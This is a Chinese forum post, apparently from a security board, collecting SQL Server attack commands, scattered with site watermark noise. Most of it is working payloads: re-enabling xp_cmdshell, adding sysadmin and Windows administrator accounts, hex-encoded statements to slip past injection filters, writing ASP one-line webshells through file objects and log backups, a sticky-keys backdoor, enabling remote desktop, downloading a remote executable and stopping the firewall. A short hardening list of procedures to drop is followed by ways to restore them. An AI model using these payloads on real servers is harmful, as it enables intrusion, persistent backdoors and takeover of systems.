收藏很久了 不过看到很多朋友没有就放出来啦~~~
出来新的方法 欢迎大家补充。。。www.t00ls.net4 [2 G8 W+ g1 g4 _; `8 Z, R7 C0 @4 p5 e
www.t00ls.net- q1 l* T* g& _8 z7 w9 i+ y/ P
sql2005恢复xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; – 低调求发展 – 老牌第三方民间网络安全交流平台; j3 R. A7 i9 a) _' Y
关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security* h6 a' \( \' R. h5 Q% b
零、T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security# L9 R! Y* T5 W% G5 A
—————& v9 z- T& b” O1 x
— 添加SA用户–
—————T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security) s- p! S+ q/ T- R. v t, y* K
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master.dbo.sp_addlogin system;T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security, B/ d, ^, D8 t4 c
2、exec master.dbo.sp_addlogin system,system;www.t00ls.net Q/ x) N” D& N4 j7 `
3、exec master.dbo.sp_addsrvrolemember itpro,sysadmin
| 低调求发展 – 潜心习安全5 r+ P0 J- `9 K% W4 N
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
防注入 sa:itpro pass:itpro
declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);– and 1=1( R: k8 I0 W0 P. F
防注入 sa:system pass:system
declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e2073797374656d2c73797374656d as varchar(4000));exec(@s);declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d626572202773797374656d272c2073797361646d696e as varchar(4000));exec(@a);– and 1=1T00LS/ f/ ^% X9 n8 L; s
一、
————–www.t00ls.net$ @3 K% F# D6 N4 U- B/ i” _
-恢复存储过程-
————–T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security& n0 r” Z/ g0 D, U
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00LS2 ?/ y: e9 W' m4 t
use master | 低调求发展 – 潜心习安全& C8 L- j+ H& `% E5 @
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'www.t00ls.net” @8 p& A3 F5 n+ y) z
exec sp_dropextendedproc “xp_cmdshell”
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'+ b+ d- \& X$ {; `* h- L
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' – 低调求发展 – 老牌第三方民间网络安全交流平台- A+ D; B! ]8 h. p
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security$ d* F1 O$ E, P. U a( u& {2 _
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' – 低调求发展 – 老牌第三方民间网络安全交流平台5 k, i% F& S) J1 |
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'www.t00ls.net ^8 b. v1 ~1 ]2 B6 R* d
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'T00LS4 n s. K$ @( F2 ~
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' | 低调求发展 – 潜心习安全. k& d! e# ]4 E7 D! y Y( [( s
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' – 低调求发展 – 老牌第三方民间网络安全交流平台8 g. w7 c* V5 P9 i @: U8 b
exec sp_addextendedproc sp_OAStop,'odsole70.dll' – 低调求发展 – 老牌第三方民间网络安全交流平台3 w. @* @ T2 p! l( u b7 j
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
恢复cmdshell防注入
============================================================T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security: g& G J% Z- t w
declare @a varchar(255),@b varchar(255),@c varchar(255);
set @a=0x6D61737465722E2E73705F616464657874656E64656470726F63;
set @b=0x78705F636D647368656C6C;
set @c=0x78706C6F6737302E646C6C;T00LS) W B( i. K$ C% ^/ `4 c/ w
exec @a @b,@cwww.t00ls.net/ e! D( I: A% g; Y: v; c. ]
============================================================” _/ d8 [+ w8 v+ ~
T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security2 @# Y' _6 G1 o9 C
二、T00LS' j! I1 R4 n' S+ r: A9 ~
———————————-
–恢复sp_addextendedproc存储过程–
———————————-T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security/ F' t! ^+ M. f6 p6 E: L F” A. Y
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
create procedure sp_addextendedproc — 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off – 低调求发展 – 老牌第三方民间网络安全交流平台: U O* _) }' d4 S! h
if @@trancount > 0T00LS: P' v; ~ n” c8 X$ T
beginT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security! _- f l& E) e/ g# j
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1) | 低调求发展 – 潜心习安全4 \' e/ K4 y. y* n, S” u# ]$ A
endwww.t00ls.net: G Y+ K2 @- ]
dbcc addextendedproc( @functname, @dllname)www.t00ls.net8 S! x, u+ c5 \
return (0) — sp_addextendedproc | 低调求发展 – 潜心习安全; e* r) C0 q V7 L0 K
GO
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& | 低调求发展 – 潜心习安全$ @6 ~) f8 @/ d* p ~( `& I
三、T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security5 O* q1 Z8 E) m+ f; w
————————– f! {0 N/ l) S8 M9 |; a# f
–使用存储过程加管理方法–
————————–
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1 w, k, M' ~$ f' m/ r$ _
1、master.dbo.xp_cmdshell 'net user itpro gmasfm && net localgroup administrators itpro /add'
2、EXEC sp_resolve_logins 'text', 'e:\asp\”&net user admina admin /add&net localgroup administrators admina /add&dir “e:\asp', '1.asp'
3、DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user sadfish fish /add'www.t00ls.net8 v, N) `0 @6 B9 z, \! @
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00LS9 t- K- Q/ J: p' B
四、
————————-
— 导出文件的存储过程 —
————————-www.t00ls.net: L9 h1 ~- K/ a$ T9 R0 G
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00LS0 ~' ]- O* J. a
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c netstat -an >c:\1.txt'www.t00ls.net1 Q' G( R! K( r# K5 E2 ]
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security+ j: B/ C+ z# }# m
五、www.t00ls.net4 l) ^( |: J( `6 W- U9 s& O3 J, v0 k8 B
—————————
— 读取文件的存储过程 —T00LS5 \. B) H$ p6 @9 G” v& X9 e
—————————) f/ B; h. ?7 j9 Y
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&www.t00ls.net9 U0 a- |# c/ D: S2 q, e. `
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o outT00LS' o. G6 c! A7 O
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\1.txt', 1www.t00ls.net9 \, t$ \ B# w3 W% q S w
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
beginT00LS1 U! m4 e, @) z% i- v
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
endT00LS4 p) q' C+ P p- p* ” `! _
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security3 T3 N |+ ~( `/ Y$ W% G+ q
六、 | 低调求发展 – 潜心习安全8 R2 F* n+ f# `
———————-
—–写一句话木马—–
———————-
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& – 低调求发展 – 老牌第三方民间网络安全交流平台' @- \# Y7 ~& w% N+ h/ p
declare @o int, @f int, @t int, @ret int | 低调求发展 – 潜心习安全4 K9 T/ N/ w+ X, Z1 e9 ~
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\Inetpub\tianhong\2.asp', 1www.t00ls.net# K0 y) F5 m% _1 a3 Y W
exec @ret = sp_oamethod @f, 'writeline', NULL,$ j( @( I: j i5 f# L- M1 y
'<%execute(request(“a”))%>' ' ' 单引号为要写的内容
<%25 if request(“x”)<>”” then execute(request(“x”))%25>
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security) o+ Z) u& v* c7 Z7 E
防注入写入法www.t00ls.net n( }9 D9 ?) V; ?4 m& B
================================================================
declare @a int,@b int,@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255),@h varchar(255),@i varchar(255),@j varchar(255);
set @c=0x6D61737465722E2E73705F6F61637265617465;www.t00ls.net6 e: l! F8 \6 \; `
set @d=0x6D61737465722E2E73705F6F616D6574686F64;
set @e=0x536372697074696E672E46696C6573797374656D4F626A656374; | 低调求发展 – 潜心习安全0 a* y7 [& w0 x7 S6 Q
set @f=0x4372656174655465787446696C65;
set @g=0x433A5C496E65747075625C73797374656D2E617370;T00LS; H* v* G% h; T0 L5 p8 k
set @h=0x74727565;
set @i=0x7772697465;” Q+ {2 D6 e” m0 T& ~, W
set @j=0x3C256576616C20726571756573742822582229253E;T00LS- y+ q: N: F! q3 p$ M1 O, c
exec @c @e,@a output; | 低调求发展 – 潜心习安全' e! G9 T2 I& `* A! K
exec @d @a,@f,@b output,@g,@h;” B* M) y% L! n” z
exec @d @b,@i,null,@j
==================================================================T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security: g& ~6 n: C6 D* r0 K0 ~
T00LS Q2 G+ L. n: o2 {7 ~
七、www.t00ls.net+ ~1 D# }# ?3 J
———————-T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security1 I” H8 B' P/ K/ ]! e# K8 [; q3 s: N2 a
—–写一句话木马—– | 低调求发展 – 潜心习安全3 u” G( V8 c% Y# _
———————-www.t00ls.net( m# L4 G6 p9 [. _, o
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;– and% 1=1
在上面一样;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request(“a”))%25>''%20';–
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx) d2 u' Z) D2 u” l
八、
———————- – 低调求发展 – 老牌第三方民间网络安全交流平台+ b; h w) y: t. {
—SA沙盒模式提权—–
———————- – 低调求发展 – 老牌第三方民间网络安全交流平台* v, B” U, n( }- q& A9 P# s
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& | 低调求发展 – 潜心习安全: f) S: @5 P% ~7 H& }& Y
1、exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;–www.t00ls.net+ C1 \& ~8 D” m, M! T1 y- ^
– 低调求发展 – 老牌第三方民间网络安全交流平台” \( d! R: F) U& j
2、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell(“net user itpro gmasfm /add”)');” b( _” A& ^$ M4 K: X3 q( n
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
T00LS* b# j2 o( L5 S/ J
九、
——————– | 低调求发展 – 潜心习安全0 R+ _5 J0 j& k. }$ F
—–另类SA提权—–T00LS9 K” H( j/ E( r/ I7 O3 l' c” n
——————– – 低调求发展 – 老牌第三方民间网络安全交流平台, [( t2 Z/ d0 c” r8 k
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security5 g9 k- W- O3 m0 v
2、declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';, w6 ^7 U' q. A t# u
1、declare @o intT00LS$ f& |' I2 j- H' A3 c
exec sp_oacreate 'scripting.filesystemobject', @o out – 低调求发展 – 老牌第三方民间网络安全交流平台” N7 c1 G3 F/ B5 n! r( [& W” y
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
DECLARE @o intT00LS1 Y, q& E- t% ^; m4 t8 b
DECLARE @z int
EXEC sp_OACreate 'Shell.Users',@o OUTwww.t00ls.net3 J' |2 r0 P* a! Z
EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
EXEC sp_OASetProperty @z, 'setting', 3 , 'AccountType'T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security* n: P) \5 Q4 P( h; A6 c
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''% e- Q- L( Y8 |3 R9 d/ Z0 q6 {
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
十、T00LS! q0 h4 X! p) v! f” _. m
————–
–导出注册表–
————–! g% U; i( \1 ~2 J. h( D
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、drop table [regdir];create table [regdir](value nvarchar(1000) null,data nvarchar(1000) null)–www.t00ls.net$ |4 D+ B a/ j3 ~4 R3 r
$ L* K/ S, `( O2 B
2、delete [regdir];insert [regdir]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
十一、
3 _/ Y% E0 m5 }1 S
—————-T00LS4 ^- _4 ]+ J0 S4 c. r) S# ]0 s. a
—下载程序—–T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security/ x; v$ g& m3 n: _
—————- – 低调求发展 – 老牌第三方民间网络安全交流平台# T” `” R8 M' a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、declare @b varbinary(8000),@hr int,@http int,@down int exec sp_oacreate [microsoft.xmlhttp],@http output exec @hr = sp_oamethod @http,[open],null,[get],[ 链接],0 exec @hr = sp_oamethod @http,[send],null exec @hr=sp_oagetproperty @http,[responsebody],@b output exec @hr=sp_oacreate [adodb.stream],@down output exec @hr=sp_oasetproperty @down,[type],1 exec @hr=sp_oasetproperty @down,[mode],3 exec @hr=sp_oamethod @down,[open],null exec @hr=sp_oamethod @down,[write],null,@b exec @hr=sp_oamethod @down,[savetofile],null,[c:/a.exe],1 ;– and 1=1* {/ I( Q8 K! F2 m1 T+ L N. d
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00LS4 ~; s* C) S. ^- `6 w( X
十二、
www.t00ls.net6 l I, U# e# d1 j) [$ L
—————–
-Log备份WebShell-
—————–
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
alter database master set RECOVERY FULL
create table cmd (a image)–www.t00ls.net) {. s8 F% B; q9 Q9 @/ Z: N/ v
backup log master to disk = 'c:\cmd' with init
insert into cmd (a) values ('<%eval(request(“a”)):response.end%>')–
backup log master to disk = 'C:\Inetpub\wwwroot\ri3.asp'–www.t00ls.net8 D3 N0 K8 R9 u, C, Q” q/ F2 d
drop table cmd–
2\
use mirT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security” v4 B( k/ T5 R” O @
alter database mir set RECOVERY FULL —
create table cmd8 (a image)–2 R5 l Y! \8 b- b# l! U
backup log mir to disk = 'c:\cmd8' with init —+ s/ f1 \1 u, E( t, I
insert into cmd8 (a) values ('<%eval(request(“a”)):response.end%>')–
backup log mir to disk = 'c:\backup.asp'–www.t00ls.net$ Z: g0 R8 r3 p6 h' n+ `& G
drop table cmd8– | 低调求发展 – 潜心习安全0 k! i5 e8 P1 b7 {
alter database mir set RECOVERY SIMPLE —
3\
create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])– – 低调求发展 – 老牌第三方民间网络安全交流平台& I% c& V# g1 ^
declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x6C0061006F007A0068006F007500/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/init,no_truncate–
insert/**/into/**/[shit_tmp](cmd)/**/values(0x3C256576616C28726571756573742822612229293A726573706F6E73652E656E64253E)– | 低调求发展 – 潜心习安全( c& w8 A8 M% u, U( y6 R5 ~+ D4 U
select/**/@s=0x63003a005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate–
Drop/**/table/**/[shit_tmp]–T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security) h- q2 ? i/ g8 s
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
十三、 | 低调求发展 – 潜心习安全3 K* a8 y m9 a! w
——————————-
–创建sp_readtextfile存储过程– – 低调求发展 – 老牌第三方民间网络安全交流平台- L- l0 J6 A3 k4 I8 D
——————————-
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Create proc sp_readTextFile @filename sysname
asT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security c1 W9 v. E! y& J' o x2 \3 p
T00LS0 ~: ], V' Q+ `' t b3 F+ H
begin
set nocount on
Create table #tempfile (line varchar(8000))
exec ('bulk insert #tempfile from “' + @filename + '”')
select * from #tempfile – 低调求发展 – 老牌第三方民间网络安全交流平台 z# r- m a# _
drop table #tempfilewww.t00ls.net$ [* T0 z' E7 A! _# ^
EndT00LS3 ^3 o* y6 f! X% K9 X
goT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security& H' f; N8 K: q, K6 o: P& C: [
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# j7 M8 {7 n4 {
十四、开3389; E$ q$ r! W! d7 s5 N1 ~/ {- h' R
===================================================================
declare @a varchar(255),@b varchar(255); set @a=0x6D61737465722E64626F2E78705F636D647368656C6C; set @b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031; exec @a @bT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security0 t5 D0 x7 i4 \9 W+ O z
===================================================================www.t00ls.net% g8 s4 N+ z' C9 }9 A% B# A
www.t00ls.net3 M8 n” q6 c% ~* m
| 低调求发展 – 潜心习安全2 V. Y e; N$ s0 a9 G$ n; X
| 低调求发展 – 潜心习安全5 M' H( U: v! P' o
我记得2003的web目录是写在C:\WINDOWS\system32\inetsrv\MetaBase.xml% o/ x8 a8 _. M) t+ g
—————– – 低调求发展 – 老牌第三方民间网络安全交流平台! D* _) Z. u( k! O3 _9 b) \6 G0 g& U
—读取文件内容–www.t00ls.net: ^7 k3 j9 @. W. r
—————–T00LS& M7 c! f2 w W* J- x3 e0 k
exec sp_readTextFile 'c:\boot.ini'
– 低调求发展 – 老牌第三方民间网络安全交流平台0 M3 @( ?2 }( ~: S
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe' – 低调求发展 – 老牌第三方民间网络安全交流平台# ^# m+ U% U a- v' H% S6 k$ M$ i
: y3 _/ [' a2 k, K( P6 G
———————–
—清除MsSql日志——-
———————–
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security2 M$ B$ f1 a1 b0 b8 u4 `8 _
set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int$ m5 u7 r$ p- }$ {0 I8 y
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
| 低调求发展 – 潜心习安全* | Z* ~% I s! l, o- p
———————-T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security# s0 I/ i/ d, l1 |1 w& _( o
–停掉或激活某个服务–T00LS' h# W” R! W( F W3 d
———————-
exec master..xp_servicecontrol 'stop','sharedaccess' | 低调求发展 – 潜心习安全5 Q8 F# `5 O4 s3 |9 Z+ ]& {$ [: L
exec master..xp_servicecontrol 'start','sharedaccess'
T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security; V$ ^! ^- {0 f3 f1 G” n X
——————–
–列出驱动器的名称–
——————–
( B6 ^3 M7 ^7 N0 `5 R
EXEC [master].[dbo].[xp_availablemedia]T00LS: b5 ~7 ^: V1 Y. m: P* V i
———————————-7 H% m* x: N) w8 W' \( @
–列出指定目录的所有下一级子目录–
———————————-9 S- E# V* n, I4 I: [ f, ]
% d” R” E, N( q7 n
EXEC [master].[dbo].[xp_subdirs] 'c:\windows'
——————————
–列出当前错误日志的具体内容–
——————————
T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security; J: K; `* F8 Y& t8 O+ _
EXEC [master].[dbo].[xp_readerrorlog] – 低调求发展 – 老牌第三方民间网络安全交流平台4 S5 @1 g, q! o3 @6 Z+ A8 \ \
———————-
–列出当前计算机名称– | 低调求发展 – 潜心习安全. p/ M. `+ {6 J6 }3 H! d; b
———————-
– 低调求发展 – 老牌第三方民间网络安全交流平台* M5 U/ `5 b$ E; g+ T$ [! g
execute master..xp_getnetname
——————————– | 低调求发展 – 潜心习安全/ D& p( ^4 f+ p/ w7 X8 s
-列出当前计算机的驱动器可用空间-
——————————–8 B, G& A7 e# ~- ^) Z2 }. B
X$ |$ G' }- T+ @” I( z6 }# I- k
execute master..xp_fixeddrives
– 低调求发展 – 老牌第三方民间网络安全交流平台0 n. J7 o& Z+ N. V
======================== | 低调求发展 – 潜心习安全+ }, _! H0 N9 C' |' A1 s8 M
==列出服务器所有本地组==
========================
+ U( v; ]5 X5 @% U
execute master..xp_enumgroupsT00LS- z. a$ l+ V3 V e$ s9 N$ b
T00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security8 d% `9 x” H” S+ v
======================
==获取MS SQL的版本号==T00LS7 o2 S6 y3 D” |, T$ Y1 {: `
======================
execute master..sp_msgetversionT00LS- c8 R2 {7 `$ ^5 b* d8 |
========================================= – 低调求发展 – 老牌第三方民间网络安全交流平台! O; b0 Y' d, y6 s” n# U
==参数说明:目录名,目录深度,是否显示文件==
=========================================
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1 – 低调求发展 – 老牌第三方民间网络安全交流平台6 A$ s( h; `0 e
execute master..xp_dirtree 'c:',1,18 S( q8 S; s3 z% O8 d
www.t00ls.net* X+ M6 ?& E* S) m/ ] J
=========================================
==列出服务器上安装的所有OLEDB提供的程序==
=========================================
www.t00ls.net4 b& U2 O8 X6 r4 `+ ^
execute master..xp_enum_oledb_providerswww.t00ls.net' ?2 P& m0 q7 ~
=========================
==列出服务器上配置的DNS==
========================= – 低调求发展 – 老牌第三方民间网络安全交流平台2 p% {$ B6 d* f1 N# E) u
T00LS, d# h- z& c7 r/ s
execute master..xp_enumdsn | 低调求发展 – 潜心习安全$ t( F% {1 J- ~) a9 o
www.t00ls.net: {/ e3 l- n3 k& C” x( ^+ |
删除存储过程 | 低调求发展 – 潜心习安全, {2 }+ P/ C3 K
drop PROCEDURE sp_addextendedproc
———————–T00LS3 w, Q3 H4 ~' u7 Y& z+ P( [; H
–删除sql危险存储过程–
———————–
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
DROP PROCEDURE sp_makewebtaskT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security9 ? l; `, ], B# \' F
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_processwww.t00ls.net) L7 Y( @1 I' D- i2 ^
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistringwww.t00ls.net. ]# X# G# c+ p, d& M6 L& w
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue0 z& G( g, L5 i' D
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_jobT00ls.Net – 低调求发展 – 潜心习安全 – Focus On Cyber Security7 [/ a$ C) | |7 @2 c( T& U& m3 e. L+ A
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwriteT00LS O9 I/ M7 R” `0 h- x0 P7 D' c5 w
exec master..sp_dropextendedproc xp_readwebtaskwww.t00ls.net9 q8 j& p/ I2 B M c1 e
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistringwww.t00ls.net- }) |8 m( P4 t” C( \/ U L c
exec master..sp_dropextendedproc sp_OACreateT00LS, N, e6 u5 |2 G4 m; ~” U* u
DROP PROCEDURE sp_addextendedproc – 低调求发展 – 老牌第三方民间网络安全交流平台) ~; ?4 r” J# h# x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00LS2 p$ o J: }6 P6 y
xp_cmdshell新的恢复办法6 d7 S2 M4 Y- A0 q& L5 f4 K
T00LS# ^% X/ f” T1 x3 [6 S# Q
扩展储存过程被删除以后可以有很简单的办法恢复:
删除 | 低调求发展 – 潜心习安全0 u9 B+ ], j' S0 ?, N& k
drop procedure sp_addextendedprocT00LS* G- H, ~5 S' B
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'3 U4 V& j8 H7 ~
– 低调求发展 – 老牌第三方民间网络安全交流平台4 Z5 A- l7 o” t. V
恢复
dbcc addextendedproc (“sp_oacreate”,”odsole70.dll”)
dbcc addextendedproc (“xp_cmdshell”,”xplog70.dll”)
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
